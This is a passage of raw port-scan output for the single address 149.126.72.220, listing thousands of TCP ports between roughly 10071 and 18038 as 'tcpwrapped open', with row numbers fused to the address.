8198149.126.72.220 10071 tcp tcpwrapped open
8199149.126.72.220 10075 tcp tcpwrapped open
8200149.126.72.220 10082 tcp tcpwrapped open
8201149.126.72.220 10084 tcp tcpwrapped open
8202149.126.72.220 10100 tcp tcpwrapped open
8203149.126.72.220 10123 tcp tcpwrapped open
8204149.126.72.220 10200 tcp tcpwrapped open
8205149.126.72.220 10443 tcp tcpwrapped open
8206149.126.72.220 10444 tcp tcpwrapped open
8207149.126.72.220 10892 tcp tcpwrapped open
8208149.126.72.220 10894 tcp tcpwrapped open
8209149.126.72.220 11001 tcp tcpwrapped open
8210149.126.72.220 11002 tcp tcpwrapped open
8211149.126.72.220 11007 tcp tcpwrapped open
8212149.126.72.220 11027 tcp tcpwrapped open
8213149.126.72.220 11065 tcp tcpwrapped open
8214149.126.72.220 11075 tcp tcpwrapped open
8215149.126.72.220 11082 tcp tcpwrapped open
8216149.126.72.220 11084 tcp tcpwrapped open
8217149.126.72.220 11110 tcp tcpwrapped open
8218149.126.72.220 11182 tcp tcpwrapped open
8219149.126.72.220 11184 tcp tcpwrapped open
8220149.126.72.220 11443 tcp tcpwrapped open
8221149.126.72.220 12016 tcp tcpwrapped open
8222149.126.72.220 12082 tcp tcpwrapped open
8223149.126.72.220 12084 tcp tcpwrapped open
8224149.126.72.220 12103 tcp tcpwrapped open
8225149.126.72.220 12104 tcp tcpwrapped open
8226149.126.72.220 12105 tcp tcpwrapped open
8227149.126.72.220 12106 tcp tcpwrapped open
8228149.126.72.220 12107 tcp tcpwrapped open
8229149.126.72.220 12108 tcp tcpwrapped open
8230149.126.72.220 12109 tcp tcpwrapped open
8231149.126.72.220 12110 tcp tcpwrapped open
8232149.126.72.220 12111 tcp tcpwrapped open
8233149.126.72.220 12112 tcp tcpwrapped open
8234149.126.72.220 12113 tcp tcpwrapped open
8235149.126.72.220 12114 tcp tcpwrapped open
8236149.126.72.220 12115 tcp tcpwrapped open
8237149.126.72.220 12116 tcp tcpwrapped open
8238149.126.72.220 12117 tcp tcpwrapped open
8239149.126.72.220 12118 tcp tcpwrapped open
8240149.126.72.220 12119 tcp tcpwrapped open
8241149.126.72.220 12120 tcp tcpwrapped open
8242149.126.72.220 12121 tcp tcpwrapped open
8243149.126.72.220 12122 tcp tcpwrapped open
8244149.126.72.220 12123 tcp tcpwrapped open
8245149.126.72.220 12124 tcp tcpwrapped open
8246149.126.72.220 12125 tcp tcpwrapped open
8247149.126.72.220 12126 tcp tcpwrapped open
8248149.126.72.220 12127 tcp tcpwrapped open
8249149.126.72.220 12128 tcp tcpwrapped open
8250149.126.72.220 12129 tcp tcpwrapped open
8251149.126.72.220 12130 tcp tcpwrapped open
8252149.126.72.220 12131 tcp tcpwrapped open
8253149.126.72.220 12132 tcp tcpwrapped open
8254149.126.72.220 12133 tcp tcpwrapped open
8255149.126.72.220 12134 tcp tcpwrapped open
8256149.126.72.220 12135 tcp tcpwrapped open
8257149.126.72.220 12136 tcp tcpwrapped open
8258149.126.72.220 12137 tcp tcpwrapped open
8259149.126.72.220 12138 tcp tcpwrapped open
8260149.126.72.220 12139 tcp tcpwrapped open
8261149.126.72.220 12140 tcp tcpwrapped open
8262149.126.72.220 12141 tcp tcpwrapped open
8263149.126.72.220 12142 tcp tcpwrapped open
8264149.126.72.220 12143 tcp tcpwrapped open
8265149.126.72.220 12144 tcp tcpwrapped open
8266149.126.72.220 12145 tcp tcpwrapped open
8267149.126.72.220 12146 tcp tcpwrapped open
8268149.126.72.220 12147 tcp tcpwrapped open
8269149.126.72.220 12148 tcp tcpwrapped open
8270149.126.72.220 12149 tcp tcpwrapped open
8271149.126.72.220 12150 tcp tcpwrapped open
8272149.126.72.220 12151 tcp tcpwrapped open
8273149.126.72.220 12152 tcp tcpwrapped open
8274149.126.72.220 12153 tcp tcpwrapped open
8275149.126.72.220 12154 tcp tcpwrapped open
8276149.126.72.220 12155 tcp tcpwrapped open
8277149.126.72.220 12156 tcp tcpwrapped open
8278149.126.72.220 12157 tcp tcpwrapped open
8279149.126.72.220 12158 tcp tcpwrapped open
8280149.126.72.220 12159 tcp tcpwrapped open
8281149.126.72.220 12160 tcp tcpwrapped open
8282149.126.72.220 12161 tcp tcpwrapped open
8283149.126.72.220 12162 tcp tcpwrapped open
8284149.126.72.220 12163 tcp tcpwrapped open
8285149.126.72.220 12164 tcp tcpwrapped open
8286149.126.72.220 12165 tcp tcpwrapped open
8287149.126.72.220 12166 tcp tcpwrapped open
8288149.126.72.220 12167 tcp tcpwrapped open
8289149.126.72.220 12168 tcp tcpwrapped open
8290149.126.72.220 12169 tcp tcpwrapped open
8291149.126.72.220 12170 tcp tcpwrapped open
8292149.126.72.220 12171 tcp tcpwrapped open
8293149.126.72.220 12172 tcp tcpwrapped open
8294149.126.72.220 12173 tcp tcpwrapped open
8295149.126.72.220 12174 tcp tcpwrapped open
8296149.126.72.220 12175 tcp tcpwrapped open
8297149.126.72.220 12176 tcp tcpwrapped open
8298149.126.72.220 12177 tcp tcpwrapped open
8299149.126.72.220 12178 tcp tcpwrapped open
8300149.126.72.220 12179 tcp tcpwrapped open
8301149.126.72.220 12180 tcp tcpwrapped open
8302149.126.72.220 12181 tcp tcpwrapped open
8303149.126.72.220 12182 tcp tcpwrapped open
8304149.126.72.220 12183 tcp tcpwrapped open
8305149.126.72.220 12184 tcp tcpwrapped open
8306149.126.72.220 12185 tcp tcpwrapped open
8307149.126.72.220 12186 tcp tcpwrapped open
8308149.126.72.220 12187 tcp tcpwrapped open
8309149.126.72.220 12188 tcp tcpwrapped open
8310149.126.72.220 12189 tcp tcpwrapped open
8311149.126.72.220 12190 tcp tcpwrapped open
8312149.126.72.220 12191 tcp tcpwrapped open
8313149.126.72.220 12192 tcp tcpwrapped open
8314149.126.72.220 12193 tcp tcpwrapped open
8315149.126.72.220 12194 tcp tcpwrapped open
8316149.126.72.220 12195 tcp tcpwrapped open
8317149.126.72.220 12196 tcp tcpwrapped open
8318149.126.72.220 12197 tcp tcpwrapped open
8319149.126.72.220 12198 tcp tcpwrapped open
8320149.126.72.220 12199 tcp tcpwrapped open
8321149.126.72.220 12200 tcp tcpwrapped open
8322149.126.72.220 12201 tcp tcpwrapped open
8323149.126.72.220 12202 tcp tcpwrapped open
8324149.126.72.220 12203 tcp tcpwrapped open
8325149.126.72.220 12204 tcp tcpwrapped open
8326149.126.72.220 12205 tcp tcpwrapped open
8327149.126.72.220 12206 tcp tcpwrapped open
8328149.126.72.220 12207 tcp tcpwrapped open
8329149.126.72.220 12208 tcp tcpwrapped open
8330149.126.72.220 12209 tcp tcpwrapped open
8331149.126.72.220 12210 tcp tcpwrapped open
8332149.126.72.220 12211 tcp tcpwrapped open
8333149.126.72.220 12212 tcp tcpwrapped open
8334149.126.72.220 12213 tcp tcpwrapped open
8335149.126.72.220 12214 tcp tcpwrapped open
8336149.126.72.220 12215 tcp tcpwrapped open
8337149.126.72.220 12216 tcp tcpwrapped open
8338149.126.72.220 12217 tcp tcpwrapped open
8339149.126.72.220 12218 tcp tcpwrapped open
8340149.126.72.220 12219 tcp tcpwrapped open
8341149.126.72.220 12220 tcp tcpwrapped open
8342149.126.72.220 12221 tcp tcpwrapped open
8343149.126.72.220 12222 tcp tcpwrapped open
8344149.126.72.220 12223 tcp tcpwrapped open
8345149.126.72.220 12224 tcp tcpwrapped open
8346149.126.72.220 12225 tcp tcpwrapped open
8347149.126.72.220 12226 tcp tcpwrapped open
8348149.126.72.220 12227 tcp tcpwrapped open
8349149.126.72.220 12228 tcp tcpwrapped open
8350149.126.72.220 12229 tcp tcpwrapped open
8351149.126.72.220 12230 tcp tcpwrapped open
8352149.126.72.220 12231 tcp tcpwrapped open
8353149.126.72.220 12232 tcp tcpwrapped open
8354149.126.72.220 12233 tcp tcpwrapped open
8355149.126.72.220 12234 tcp tcpwrapped open
8356149.126.72.220 12235 tcp tcpwrapped open
8357149.126.72.220 12236 tcp tcpwrapped open
8358149.126.72.220 12237 tcp tcpwrapped open
8359149.126.72.220 12238 tcp tcpwrapped open
8360149.126.72.220 12239 tcp tcpwrapped open
8361149.126.72.220 12240 tcp tcpwrapped open
8362149.126.72.220 12241 tcp tcpwrapped open
8363149.126.72.220 12242 tcp tcpwrapped open
8364149.126.72.220 12243 tcp tcpwrapped open
8365149.126.72.220 12244 tcp tcpwrapped open
8366149.126.72.220 12245 tcp tcpwrapped open
8367149.126.72.220 12246 tcp tcpwrapped open
8368149.126.72.220 12247 tcp tcpwrapped open
8369149.126.72.220 12248 tcp tcpwrapped open
8370149.126.72.220 12249 tcp tcpwrapped open
8371149.126.72.220 12250 tcp tcpwrapped open
8372149.126.72.220 12251 tcp tcpwrapped open
8373149.126.72.220 12252 tcp tcpwrapped open
8374149.126.72.220 12253 tcp tcpwrapped open
8375149.126.72.220 12254 tcp tcpwrapped open
8376149.126.72.220 12255 tcp tcpwrapped open
8377149.126.72.220 12256 tcp tcpwrapped open
8378149.126.72.220 12257 tcp tcpwrapped open
8379149.126.72.220 12258 tcp tcpwrapped open
8380149.126.72.220 12259 tcp tcpwrapped open
8381149.126.72.220 12260 tcp tcpwrapped open
8382149.126.72.220 12261 tcp tcpwrapped open
8383149.126.72.220 12262 tcp tcpwrapped open
8384149.126.72.220 12263 tcp tcpwrapped open
8385149.126.72.220 12264 tcp tcpwrapped open
8386149.126.72.220 12265 tcp tcpwrapped open
8387149.126.72.220 12266 tcp tcpwrapped open
8388149.126.72.220 12267 tcp tcpwrapped open
8389149.126.72.220 12268 tcp tcpwrapped open
8390149.126.72.220 12269 tcp tcpwrapped open
8391149.126.72.220 12270 tcp tcpwrapped open
8392149.126.72.220 12271 tcp tcpwrapped open
8393149.126.72.220 12272 tcp tcpwrapped open
8394149.126.72.220 12273 tcp tcpwrapped open
8395149.126.72.220 12274 tcp tcpwrapped open
8396149.126.72.220 12275 tcp tcpwrapped open
8397149.126.72.220 12276 tcp tcpwrapped open
8398149.126.72.220 12277 tcp tcpwrapped open
8399149.126.72.220 12278 tcp tcpwrapped open
8400149.126.72.220 12279 tcp tcpwrapped open
8401149.126.72.220 12280 tcp tcpwrapped open
8402149.126.72.220 12281 tcp tcpwrapped open
8403149.126.72.220 12282 tcp tcpwrapped open
8404149.126.72.220 12283 tcp tcpwrapped open
8405149.126.72.220 12284 tcp tcpwrapped open
8406149.126.72.220 12285 tcp tcpwrapped open
8407149.126.72.220 12286 tcp tcpwrapped open
8408149.126.72.220 12287 tcp tcpwrapped open
8409149.126.72.220 12288 tcp tcpwrapped open
8410149.126.72.220 12289 tcp tcpwrapped open
8411149.126.72.220 12290 tcp tcpwrapped open
8412149.126.72.220 12291 tcp tcpwrapped open
8413149.126.72.220 12292 tcp tcpwrapped open
8414149.126.72.220 12293 tcp tcpwrapped open
8415149.126.72.220 12294 tcp tcpwrapped open
8416149.126.72.220 12295 tcp tcpwrapped open
8417149.126.72.220 12296 tcp tcpwrapped open
8418149.126.72.220 12297 tcp tcpwrapped open
8419149.126.72.220 12298 tcp tcpwrapped open
8420149.126.72.220 12299 tcp tcpwrapped open
8421149.126.72.220 12300 tcp tcpwrapped open
8422149.126.72.220 12301 tcp tcpwrapped open
8423149.126.72.220 12302 tcp tcpwrapped open
8424149.126.72.220 12303 tcp tcpwrapped open
8425149.126.72.220 12304 tcp tcpwrapped open
8426149.126.72.220 12305 tcp tcpwrapped open
8427149.126.72.220 12306 tcp tcpwrapped open
8428149.126.72.220 12307 tcp tcpwrapped open
8429149.126.72.220 12308 tcp tcpwrapped open
8430149.126.72.220 12309 tcp tcpwrapped open
8431149.126.72.220 12310 tcp tcpwrapped open
8432149.126.72.220 12311 tcp tcpwrapped open
8433149.126.72.220 12312 tcp tcpwrapped open
8434149.126.72.220 12313 tcp tcpwrapped open
8435149.126.72.220 12314 tcp tcpwrapped open
8436149.126.72.220 12315 tcp tcpwrapped open
8437149.126.72.220 12316 tcp tcpwrapped open
8438149.126.72.220 12317 tcp tcpwrapped open
8439149.126.72.220 12318 tcp tcpwrapped open
8440149.126.72.220 12319 tcp tcpwrapped open
8441149.126.72.220 12320 tcp tcpwrapped open
8442149.126.72.220 12321 tcp tcpwrapped open
8443149.126.72.220 12322 tcp tcpwrapped open
8444149.126.72.220 12323 tcp tcpwrapped open
8445149.126.72.220 12324 tcp tcpwrapped open
8446149.126.72.220 12325 tcp tcpwrapped open
8447149.126.72.220 12326 tcp tcpwrapped open
8448149.126.72.220 12327 tcp tcpwrapped open
8449149.126.72.220 12328 tcp tcpwrapped open
8450149.126.72.220 12329 tcp tcpwrapped open
8451149.126.72.220 12330 tcp tcpwrapped open
8452149.126.72.220 12331 tcp tcpwrapped open
8453149.126.72.220 12332 tcp tcpwrapped open
8454149.126.72.220 12333 tcp tcpwrapped open
8455149.126.72.220 12334 tcp tcpwrapped open
8456149.126.72.220 12335 tcp tcpwrapped open
8457149.126.72.220 12336 tcp tcpwrapped open
8458149.126.72.220 12337 tcp tcpwrapped open
8459149.126.72.220 12338 tcp tcpwrapped open
8460149.126.72.220 12339 tcp tcpwrapped open
8461149.126.72.220 12340 tcp tcpwrapped open
8462149.126.72.220 12341 tcp tcpwrapped open
8463149.126.72.220 12342 tcp tcpwrapped open
8464149.126.72.220 12343 tcp tcpwrapped open
8465149.126.72.220 12344 tcp tcpwrapped open
8466149.126.72.220 12345 tcp tcpwrapped open
8467149.126.72.220 12346 tcp tcpwrapped open
8468149.126.72.220 12347 tcp tcpwrapped open
8469149.126.72.220 12348 tcp tcpwrapped open
8470149.126.72.220 12349 tcp tcpwrapped open
8471149.126.72.220 12350 tcp tcpwrapped open
8472149.126.72.220 12351 tcp tcpwrapped open
8473149.126.72.220 12352 tcp tcpwrapped open
8474149.126.72.220 12353 tcp tcpwrapped open
8475149.126.72.220 12354 tcp tcpwrapped open
8476149.126.72.220 12355 tcp tcpwrapped open
8477149.126.72.220 12356 tcp tcpwrapped open
8478149.126.72.220 12357 tcp tcpwrapped open
8479149.126.72.220 12358 tcp tcpwrapped open
8480149.126.72.220 12359 tcp tcpwrapped open
8481149.126.72.220 12360 tcp tcpwrapped open
8482149.126.72.220 12361 tcp tcpwrapped open
8483149.126.72.220 12362 tcp tcpwrapped open
8484149.126.72.220 12363 tcp tcpwrapped open
8485149.126.72.220 12364 tcp tcpwrapped open
8486149.126.72.220 12365 tcp tcpwrapped open
8487149.126.72.220 12366 tcp tcpwrapped open
8488149.126.72.220 12367 tcp tcpwrapped open
8489149.126.72.220 12368 tcp tcpwrapped open
8490149.126.72.220 12369 tcp tcpwrapped open
8491149.126.72.220 12370 tcp tcpwrapped open
8492149.126.72.220 12371 tcp tcpwrapped open
8493149.126.72.220 12372 tcp tcpwrapped open
8494149.126.72.220 12373 tcp tcpwrapped open
8495149.126.72.220 12374 tcp tcpwrapped open
8496149.126.72.220 12375 tcp tcpwrapped open
8497149.126.72.220 12376 tcp tcpwrapped open
8498149.126.72.220 12377 tcp tcpwrapped open
8499149.126.72.220 12378 tcp tcpwrapped open
8500149.126.72.220 12379 tcp tcpwrapped open
8501149.126.72.220 12380 tcp tcpwrapped open
8502149.126.72.220 12381 tcp tcpwrapped open
8503149.126.72.220 12382 tcp tcpwrapped open
8504149.126.72.220 12383 tcp tcpwrapped open
8505149.126.72.220 12384 tcp tcpwrapped open
8506149.126.72.220 12385 tcp tcpwrapped open
8507149.126.72.220 12386 tcp tcpwrapped open
8508149.126.72.220 12387 tcp tcpwrapped open
8509149.126.72.220 12388 tcp tcpwrapped open
8510149.126.72.220 12389 tcp tcpwrapped open
8511149.126.72.220 12390 tcp tcpwrapped open
8512149.126.72.220 12391 tcp tcpwrapped open
8513149.126.72.220 12392 tcp tcpwrapped open
8514149.126.72.220 12393 tcp tcpwrapped open
8515149.126.72.220 12394 tcp tcpwrapped open
8516149.126.72.220 12395 tcp tcpwrapped open
8517149.126.72.220 12396 tcp tcpwrapped open
8518149.126.72.220 12397 tcp tcpwrapped open
8519149.126.72.220 12398 tcp tcpwrapped open
8520149.126.72.220 12399 tcp tcpwrapped open
8521149.126.72.220 12400 tcp tcpwrapped open
8522149.126.72.220 12401 tcp tcpwrapped open
8523149.126.72.220 12402 tcp tcpwrapped open
8524149.126.72.220 12403 tcp tcpwrapped open
8525149.126.72.220 12404 tcp tcpwrapped open
8526149.126.72.220 12405 tcp tcpwrapped open
8527149.126.72.220 12406 tcp tcpwrapped open
8528149.126.72.220 12407 tcp tcpwrapped open
8529149.126.72.220 12408 tcp tcpwrapped open
8530149.126.72.220 12409 tcp tcpwrapped open
8531149.126.72.220 12410 tcp tcpwrapped open
8532149.126.72.220 12411 tcp tcpwrapped open
8533149.126.72.220 12412 tcp tcpwrapped open
8534149.126.72.220 12413 tcp tcpwrapped open
8535149.126.72.220 12414 tcp tcpwrapped open
8536149.126.72.220 12415 tcp tcpwrapped open
8537149.126.72.220 12416 tcp tcpwrapped open
8538149.126.72.220 12417 tcp tcpwrapped open
8539149.126.72.220 12418 tcp tcpwrapped open
8540149.126.72.220 12419 tcp tcpwrapped open
8541149.126.72.220 12420 tcp tcpwrapped open
8542149.126.72.220 12421 tcp tcpwrapped open
8543149.126.72.220 12422 tcp tcpwrapped open
8544149.126.72.220 12423 tcp tcpwrapped open
8545149.126.72.220 12424 tcp tcpwrapped open
8546149.126.72.220 12425 tcp tcpwrapped open
8547149.126.72.220 12426 tcp tcpwrapped open
8548149.126.72.220 12427 tcp tcpwrapped open
8549149.126.72.220 12428 tcp tcpwrapped open
8550149.126.72.220 12429 tcp tcpwrapped open
8551149.126.72.220 12430 tcp tcpwrapped open
8552149.126.72.220 12431 tcp tcpwrapped open
8553149.126.72.220 12432 tcp tcpwrapped open
8554149.126.72.220 12433 tcp tcpwrapped open
8555149.126.72.220 12434 tcp tcpwrapped open
8556149.126.72.220 12435 tcp tcpwrapped open
8557149.126.72.220 12436 tcp tcpwrapped open
8558149.126.72.220 12437 tcp tcpwrapped open
8559149.126.72.220 12438 tcp tcpwrapped open
8560149.126.72.220 12439 tcp tcpwrapped open
8561149.126.72.220 12440 tcp tcpwrapped open
8562149.126.72.220 12441 tcp tcpwrapped open
8563149.126.72.220 12442 tcp tcpwrapped open
8564149.126.72.220 12443 tcp tcpwrapped open
8565149.126.72.220 12444 tcp tcpwrapped open
8566149.126.72.220 12445 tcp tcpwrapped open
8567149.126.72.220 12446 tcp tcpwrapped open
8568149.126.72.220 12447 tcp tcpwrapped open
8569149.126.72.220 12448 tcp tcpwrapped open
8570149.126.72.220 12449 tcp tcpwrapped open
8571149.126.72.220 12450 tcp tcpwrapped open
8572149.126.72.220 12451 tcp tcpwrapped open
8573149.126.72.220 12452 tcp tcpwrapped open
8574149.126.72.220 12453 tcp tcpwrapped open
8575149.126.72.220 12454 tcp tcpwrapped open
8576149.126.72.220 12455 tcp tcpwrapped open
8577149.126.72.220 12456 tcp tcpwrapped open
8578149.126.72.220 12457 tcp tcpwrapped open
8579149.126.72.220 12458 tcp tcpwrapped open
8580149.126.72.220 12459 tcp tcpwrapped open
8581149.126.72.220 12460 tcp tcpwrapped open
8582149.126.72.220 12461 tcp tcpwrapped open
8583149.126.72.220 12462 tcp tcpwrapped open
8584149.126.72.220 12463 tcp tcpwrapped open
8585149.126.72.220 12464 tcp tcpwrapped open
8586149.126.72.220 12465 tcp tcpwrapped open
8587149.126.72.220 12466 tcp tcpwrapped open
8588149.126.72.220 12467 tcp tcpwrapped open
8589149.126.72.220 12468 tcp tcpwrapped open
8590149.126.72.220 12469 tcp tcpwrapped open
8591149.126.72.220 12470 tcp tcpwrapped open
8592149.126.72.220 12471 tcp tcpwrapped open
8593149.126.72.220 12472 tcp tcpwrapped open
8594149.126.72.220 12473 tcp tcpwrapped open
8595149.126.72.220 12474 tcp tcpwrapped open
8596149.126.72.220 12475 tcp tcpwrapped open
8597149.126.72.220 12476 tcp tcpwrapped open
8598149.126.72.220 12477 tcp tcpwrapped open
8599149.126.72.220 12478 tcp tcpwrapped open
8600149.126.72.220 12479 tcp tcpwrapped open
8601149.126.72.220 12480 tcp tcpwrapped open
8602149.126.72.220 12481 tcp tcpwrapped open
8603149.126.72.220 12482 tcp tcpwrapped open
8604149.126.72.220 12483 tcp tcpwrapped open
8605149.126.72.220 12484 tcp tcpwrapped open
8606149.126.72.220 12485 tcp tcpwrapped open
8607149.126.72.220 12486 tcp tcpwrapped open
8608149.126.72.220 12487 tcp tcpwrapped open
8609149.126.72.220 12488 tcp tcpwrapped open
8610149.126.72.220 12489 tcp tcpwrapped open
8611149.126.72.220 12490 tcp tcpwrapped open
8612149.126.72.220 12491 tcp tcpwrapped open
8613149.126.72.220 12492 tcp tcpwrapped open
8614149.126.72.220 12493 tcp tcpwrapped open
8615149.126.72.220 12494 tcp tcpwrapped open
8616149.126.72.220 12495 tcp tcpwrapped open
8617149.126.72.220 12496 tcp tcpwrapped open
8618149.126.72.220 12497 tcp tcpwrapped open
8619149.126.72.220 12498 tcp tcpwrapped open
8620149.126.72.220 12499 tcp tcpwrapped open
8621149.126.72.220 12500 tcp tcpwrapped open
8622149.126.72.220 12501 tcp tcpwrapped open
8623149.126.72.220 12502 tcp tcpwrapped open
8624149.126.72.220 12503 tcp tcpwrapped open
8625149.126.72.220 12504 tcp tcpwrapped open
8626149.126.72.220 12505 tcp tcpwrapped open
8627149.126.72.220 12506 tcp tcpwrapped open
8628149.126.72.220 12507 tcp tcpwrapped open
8629149.126.72.220 12508 tcp tcpwrapped open
8630149.126.72.220 12509 tcp tcpwrapped open
8631149.126.72.220 12510 tcp tcpwrapped open
8632149.126.72.220 12511 tcp tcpwrapped open
8633149.126.72.220 12512 tcp tcpwrapped open
8634149.126.72.220 12513 tcp tcpwrapped open
8635149.126.72.220 12514 tcp tcpwrapped open
8636149.126.72.220 12515 tcp tcpwrapped open
8637149.126.72.220 12516 tcp tcpwrapped open
8638149.126.72.220 12517 tcp tcpwrapped open
8639149.126.72.220 12518 tcp tcpwrapped open
8640149.126.72.220 12519 tcp tcpwrapped open
8641149.126.72.220 12520 tcp tcpwrapped open
8642149.126.72.220 12521 tcp tcpwrapped open
8643149.126.72.220 12522 tcp tcpwrapped open
8644149.126.72.220 12523 tcp tcpwrapped open
8645149.126.72.220 12524 tcp tcpwrapped open
8646149.126.72.220 12525 tcp tcpwrapped open
8647149.126.72.220 12526 tcp tcpwrapped open
8648149.126.72.220 12527 tcp tcpwrapped open
8649149.126.72.220 12528 tcp tcpwrapped open
8650149.126.72.220 12529 tcp tcpwrapped open
8651149.126.72.220 12530 tcp tcpwrapped open
8652149.126.72.220 12531 tcp tcpwrapped open
8653149.126.72.220 12532 tcp tcpwrapped open
8654149.126.72.220 12533 tcp tcpwrapped open
8655149.126.72.220 12534 tcp tcpwrapped open
8656149.126.72.220 12535 tcp tcpwrapped open
8657149.126.72.220 12536 tcp tcpwrapped open
8658149.126.72.220 12537 tcp tcpwrapped open
8659149.126.72.220 12538 tcp tcpwrapped open
8660149.126.72.220 12539 tcp tcpwrapped open
8661149.126.72.220 12540 tcp tcpwrapped open
8662149.126.72.220 12541 tcp tcpwrapped open
8663149.126.72.220 12542 tcp tcpwrapped open
8664149.126.72.220 12543 tcp tcpwrapped open
8665149.126.72.220 12544 tcp tcpwrapped open
8666149.126.72.220 12545 tcp tcpwrapped open
8667149.126.72.220 12546 tcp tcpwrapped open
8668149.126.72.220 12547 tcp tcpwrapped open
8669149.126.72.220 12548 tcp tcpwrapped open
8670149.126.72.220 12549 tcp tcpwrapped open
8671149.126.72.220 12550 tcp tcpwrapped open
8672149.126.72.220 12551 tcp tcpwrapped open
8673149.126.72.220 12552 tcp tcpwrapped open
8674149.126.72.220 12553 tcp tcpwrapped open
8675149.126.72.220 12554 tcp tcpwrapped open
8676149.126.72.220 12555 tcp tcpwrapped open
8677149.126.72.220 12556 tcp tcpwrapped open
8678149.126.72.220 12557 tcp tcpwrapped open
8679149.126.72.220 12558 tcp tcpwrapped open
8680149.126.72.220 12559 tcp tcpwrapped open
8681149.126.72.220 12560 tcp tcpwrapped open
8682149.126.72.220 12561 tcp tcpwrapped open
8683149.126.72.220 12562 tcp tcpwrapped open
8684149.126.72.220 12563 tcp tcpwrapped open
8685149.126.72.220 12564 tcp tcpwrapped open
8686149.126.72.220 12565 tcp tcpwrapped open
8687149.126.72.220 12566 tcp tcpwrapped open
8688149.126.72.220 12567 tcp tcpwrapped open
8689149.126.72.220 12568 tcp tcpwrapped open
8690149.126.72.220 12569 tcp tcpwrapped open
8691149.126.72.220 12570 tcp tcpwrapped open
8692149.126.72.220 12571 tcp tcpwrapped open
8693149.126.72.220 12572 tcp tcpwrapped open
8694149.126.72.220 12573 tcp tcpwrapped open
8695149.126.72.220 12574 tcp tcpwrapped open
8696149.126.72.220 12575 tcp tcpwrapped open
8697149.126.72.220 12576 tcp tcpwrapped open
8698149.126.72.220 12577 tcp tcpwrapped open
8699149.126.72.220 12578 tcp tcpwrapped open
8700149.126.72.220 12579 tcp tcpwrapped open
8701149.126.72.220 12580 tcp tcpwrapped open
8702149.126.72.220 12581 tcp tcpwrapped open
8703149.126.72.220 12582 tcp tcpwrapped open
8704149.126.72.220 12583 tcp tcpwrapped open
8705149.126.72.220 12584 tcp tcpwrapped open
8706149.126.72.220 12585 tcp tcpwrapped open
8707149.126.72.220 12586 tcp tcpwrapped open
8708149.126.72.220 12587 tcp tcpwrapped open
8709149.126.72.220 12588 tcp tcpwrapped open
8710149.126.72.220 12589 tcp tcpwrapped open
8711149.126.72.220 12590 tcp tcpwrapped open
8712149.126.72.220 13082 tcp tcpwrapped open
8713149.126.72.220 13084 tcp tcpwrapped open
8714149.126.72.220 13333 tcp tcpwrapped open
8715149.126.72.220 13443 tcp tcpwrapped open
8716149.126.72.220 14006 tcp tcpwrapped open
8717149.126.72.220 14082 tcp tcpwrapped open
8718149.126.72.220 14084 tcp tcpwrapped open
8719149.126.72.220 14104 tcp tcpwrapped open
8720149.126.72.220 14130 tcp tcpwrapped open
8721149.126.72.220 14182 tcp tcpwrapped open
8722149.126.72.220 14184 tcp tcpwrapped open
8723149.126.72.220 14330 tcp tcpwrapped open
8724149.126.72.220 14443 tcp tcpwrapped open
8725149.126.72.220 14825 tcp tcpwrapped open
8726149.126.72.220 15002 tcp tcpwrapped open
8727149.126.72.220 15006 tcp tcpwrapped open
8728149.126.72.220 15082 tcp tcpwrapped open
8729149.126.72.220 15084 tcp tcpwrapped open
8730149.126.72.220 15151 tcp tcpwrapped open
8731149.126.72.220 15555 tcp tcpwrapped open
8732149.126.72.220 16000 tcp tcpwrapped open
8733149.126.72.220 16001 tcp tcpwrapped open
8734149.126.72.220 16015 tcp tcpwrapped open
8735149.126.72.220 16016 tcp tcpwrapped open
8736149.126.72.220 16017 tcp tcpwrapped open
8737149.126.72.220 16082 tcp tcpwrapped open
8738149.126.72.220 16084 tcp tcpwrapped open
8739149.126.72.220 16311 tcp tcpwrapped open
8740149.126.72.220 16316 tcp tcpwrapped open
8741149.126.72.220 16443 tcp tcpwrapped open
8742149.126.72.220 16800 tcp tcpwrapped open
8743149.126.72.220 16888 tcp tcpwrapped open
8744149.126.72.220 17082 tcp tcpwrapped open
8745149.126.72.220 17084 tcp tcpwrapped open
8746149.126.72.220 17182 tcp tcpwrapped open
8747149.126.72.220 17184 tcp tcpwrapped open
8748149.126.72.220 17770 tcp tcpwrapped open
8749149.126.72.220 17771 tcp tcpwrapped open
8750149.126.72.220 17772 tcp tcpwrapped open
8751149.126.72.220 17773 tcp tcpwrapped open
8752149.126.72.220 17774 tcp tcpwrapped open
8753149.126.72.220 17775 tcp tcpwrapped open
8754149.126.72.220 17776 tcp tcpwrapped open
8755149.126.72.220 17777 tcp tcpwrapped open
8756149.126.72.220 17778 tcp tcpwrapped open
8757149.126.72.220 17779 tcp tcpwrapped open
8758149.126.72.220 17780 tcp tcpwrapped open
8759149.126.72.220 18000 tcp tcpwrapped open
8760149.126.72.220 18001 tcp tcpwrapped open
8761149.126.72.220 18002 tcp tcpwrapped open
8762149.126.72.220 18003 tcp tcpwrapped open
8763149.126.72.220 18004 tcp tcpwrapped open
8764149.126.72.220 18005 tcp tcpwrapped open
8765149.126.72.220 18006 tcp tcpwrapped open
8766149.126.72.220 18007 tcp tcpwrapped open
8767149.126.72.220 18008 tcp tcpwrapped open
8768149.126.72.220 18009 tcp tcpwrapped open
8769149.126.72.220 18010 tcp tcpwrapped open
8770149.126.72.220 18011 tcp tcpwrapped open
8771149.126.72.220 18012 tcp tcpwrapped open
8772149.126.72.220 18013 tcp tcpwrapped open
8773149.126.72.220 18014 tcp tcpwrapped open
8774149.126.72.220 18015 tcp tcpwrapped open
8775149.126.72.220 18016 tcp tcpwrapped open
8776149.126.72.220 18017 tcp tcpwrapped open
8777149.126.72.220 18018 tcp tcpwrapped open
8778149.126.72.220 18019 tcp tcpwrapped open
8779149.126.72.220 18020 tcp tcpwrapped open
8780149.126.72.220 18021 tcp tcpwrapped open
8781149.126.72.220 18022 tcp tcpwrapped open
8782149.126.72.220 18023 tcp tcpwrapped open
8783149.126.72.220 18024 tcp tcpwrapped open
8784149.126.72.220 18025 tcp tcpwrapped open
8785149.126.72.220 18026 tcp tcpwrapped open
8786149.126.72.220 18027 tcp tcpwrapped open
8787149.126.72.220 18028 tcp tcpwrapped open
8788149.126.72.220 18029 tcp tcpwrapped open
8789149.126.72.220 18030 tcp tcpwrapped open
8790149.126.72.220 18031 tcp tcpwrapped open
8791149.126.72.220 18032 tcp tcpwrapped open
8792149.126.72.220 18033 tcp tcpwrapped open
8793149.126.72.220 18034 tcp tcpwrapped open
8794149.126.72.220 18035 tcp tcpwrapped open
8795149.126.72.220 18036 tcp tcpwrapped open
8796149.126.72.220 18037 tcp tcpwrapped open
8797149.126.72.220 18038 tcp tcpwrapped open
